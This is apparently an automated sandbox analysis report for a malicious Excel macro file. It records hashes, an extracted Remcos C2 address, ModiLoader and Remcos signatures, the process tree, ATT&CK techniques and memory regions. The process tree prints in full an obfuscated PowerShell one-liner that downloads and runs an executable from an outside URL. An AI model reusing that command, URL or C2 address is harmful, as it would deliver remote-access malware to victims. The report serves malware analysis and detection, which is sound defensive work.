Analysis

  • max time kernel
    148s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18-01-2021 16:33

General

  • Target

    Order No-202000125.xlsm

  • Size

    410KB

  • MD5

    2c71ebde60e06f76a2ccc831400f24b7

  • SHA1

    7d7294586a74052bce542ba4cd1fb3eeb2ea08a3

  • SHA256

    cc52b8f39a31d7372f7c3d76e386fa20f830b530dec05ce67229e4abf33c92d9

  • SHA512

    ec36d40a564d98c77a198eed1ab1d0fae309e19800fa00a9f50fdfab6b393bca804c71ca97ce2354c47e707a7d0d84429e280ddb4c0a93730c4f953331b31f87

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://winsfgt.com/php/u.exe

Extracted

Family

remcos

C2

79.134.225.19:2556

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • ModiLoader First Stage 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Order No-202000125.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1212
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start p^owersh^el^l -w 1 (New-Object Net.WebClient).DownloadFile('http://winsfgt.com/php/u.exe',($env:Temp)+'\bFPTx.bat')
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3656
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w 1 (New-Object Net.WebClient).DownloadFile('http://winsfgt.com/php/u.exe',($env:Temp)+'\bFPTx.bat')
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3940
    • C:\Users\Admin\AppData\Local\Temp\bFPTx.bat
      C:\Users\Admin\AppData\Local\Temp\bFPTx.bat
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:400
      • C:\Program Files (x86)\internet explorer\ieinstal.exe
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:3108
        • C:\Program Files (x86)\internet explorer\ieinstal.exe
          "C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ggiuyoklxolopxxuaxdnfucxt"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1596
        • C:\Program Files (x86)\internet explorer\ieinstal.exe
          "C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qbnmzgvelwdtsdlyjhygizxguofi"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:800
        • C:\Program Files (x86)\internet explorer\ieinstal.exe
          "C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tdtfzzggzevgcrzktslitmsxdcxrwpop"
          4⤵
            PID:3636

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\bFPTx.bat
      MD5

      1982963b64d323f39033d40641437595

      SHA1

      8dde953e501af236d8be98dbf6d683fda458ba38

      SHA256

      60119cfc3cd6b63295c163fad7ab43949d62d5ed6bb024cd3054a2c64e8339c7

      SHA512

      75481182ea78ca9e6ee9022db2e2cfb869419a779e37e149d8c70da3e3f8132dcffcb53a368311bd7dfbe13dab1ee2eae7846aefd361848a375f91d4f61e31b1

    • C:\Users\Admin\AppData\Local\Temp\bFPTx.bat
      MD5

      1982963b64d323f39033d40641437595

      SHA1

      8dde953e501af236d8be98dbf6d683fda458ba38

      SHA256

      60119cfc3cd6b63295c163fad7ab43949d62d5ed6bb024cd3054a2c64e8339c7

      SHA512

      75481182ea78ca9e6ee9022db2e2cfb869419a779e37e149d8c70da3e3f8132dcffcb53a368311bd7dfbe13dab1ee2eae7846aefd361848a375f91d4f61e31b1

    • C:\Users\Admin\AppData\Local\Temp\ggiuyoklxolopxxuaxdnfucxt
      MD5

      1e69b6d630e694119f4f8c448a430b60

      SHA1

      b118feca7d85ec706b54279a1dafc71673fe6e54

      SHA256

      2f7eedbe9e3b0a3aa08df4fa2dc27de189484a8da8925cc6056513d744b7c00e

      SHA512

      19924161f75cbbcf7bdf122f3aecb43d813186a6693413ccc15bb2945d48401c8f058edf034cc641cedc97ae5e328d88fabfab1b5f324014b83671b3ebd78822

    • memory/400-16-0x0000000000000000-mapping.dmp
    • memory/400-18-0x0000000000690000-0x0000000000691000-memory.dmp
      Filesize

      4KB

    • memory/800-32-0x0000000000400000-0x0000000000424000-memory.dmp
      Filesize

      144KB

    • memory/800-36-0x0000000000400000-0x0000000000424000-memory.dmp
      Filesize

      144KB

    • memory/800-33-0x0000000000422206-mapping.dmp
    • memory/1212-6-0x00007FFC22770000-0x00007FFC22780000-memory.dmp
      Filesize

      64KB

    • memory/1212-2-0x00007FFC22770000-0x00007FFC22780000-memory.dmp
      Filesize

      64KB

    • memory/1212-5-0x00007FFC48040000-0x00007FFC48677000-memory.dmp
      Filesize

      6.2MB

    • memory/1212-4-0x00007FFC22770000-0x00007FFC22780000-memory.dmp
      Filesize

      64KB

    • memory/1212-3-0x00007FFC22770000-0x00007FFC22780000-memory.dmp
      Filesize

      64KB

    • memory/1596-31-0x0000000000476274-mapping.dmp
    • memory/1596-30-0x0000000000400000-0x0000000000478000-memory.dmp
      Filesize

      480KB

    • memory/1596-37-0x0000000000400000-0x0000000000478000-memory.dmp
      Filesize

      480KB

    • memory/3108-28-0x0000000010540000-0x0000000010564000-memory.dmp
      Filesize

      144KB

    • memory/3108-20-0x0000000000000000-mapping.dmp
    • memory/3108-21-0x0000000000600000-0x0000000000601000-memory.dmp
      Filesize

      4KB

    • memory/3108-23-0x00000000003A0000-0x00000000003A1000-memory.dmp
      Filesize

      4KB

    • memory/3108-29-0x0000000000610000-0x0000000000631000-memory.dmp
      Filesize

      132KB

    • memory/3108-19-0x0000000000340000-0x0000000000341000-memory.dmp
      Filesize

      4KB

    • memory/3636-34-0x0000000000400000-0x0000000000457000-memory.dmp
      Filesize

      348KB

    • memory/3636-38-0x0000000000400000-0x0000000000457000-memory.dmp
      Filesize

      348KB

    • memory/3636-35-0x0000000000455238-mapping.dmp
    • memory/3656-7-0x0000000000000000-mapping.dmp
    • memory/3940-10-0x0000028553810000-0x0000028553811000-memory.dmp
      Filesize

      4KB

    • memory/3940-9-0x00007FFC3CB80000-0x00007FFC3D56C000-memory.dmp
      Filesize

      9.9MB

    • memory/3940-11-0x0000028553A10000-0x0000028553A11000-memory.dmp
      Filesize

      4KB

    • memory/3940-13-0x0000028553883000-0x0000028553885000-memory.dmp
      Filesize

      8KB

    • memory/3940-12-0x0000028553880000-0x0000028553882000-memory.dmp
      Filesize

      8KB

    • memory/3940-8-0x0000000000000000-mapping.dmp
    • memory/3940-14-0x0000028553886000-0x0000028553888000-memory.dmp
      Filesize

      8KB